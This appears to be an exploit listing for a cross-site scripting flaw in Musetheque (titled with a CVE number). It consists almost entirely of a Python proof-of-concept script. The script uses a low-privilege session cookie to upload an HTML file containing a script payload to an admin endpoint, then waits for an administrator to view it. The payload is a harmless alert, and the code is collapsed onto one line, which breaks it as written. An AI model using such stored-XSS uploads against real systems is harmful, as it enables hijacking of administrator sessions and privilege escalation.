CVE-2026-24662 Musetheque跨站脚本漏洞

import requests # Target URL (Example) target_url = "http://target-ip/admin/upload" admin_view_url = "http://target-ip/admin/file_view" # Attacker's low-privilege session cookie cookies = { "session_id": "low_privilege_session_token" } # Malicious file content intended to be executed when viewed # The vulnerability triggers when the file info is displayed payload_content = "<script>alert('XSS via File Upload');</script>" # Construct the multipart form data files = { 'file': ('exploit.html', payload_content, 'text/html') } data = { 'description': 'Test file for XSS' } # Step 1: Upload the malicious file try: response = requests.post(target_url, files=files, data=data, cookies=cookies) if response.status_code == 200: print("[+] File uploaded successfully.") print("[*] Wait for an administrator to view the file information page.") else: print(f"[-] Upload failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")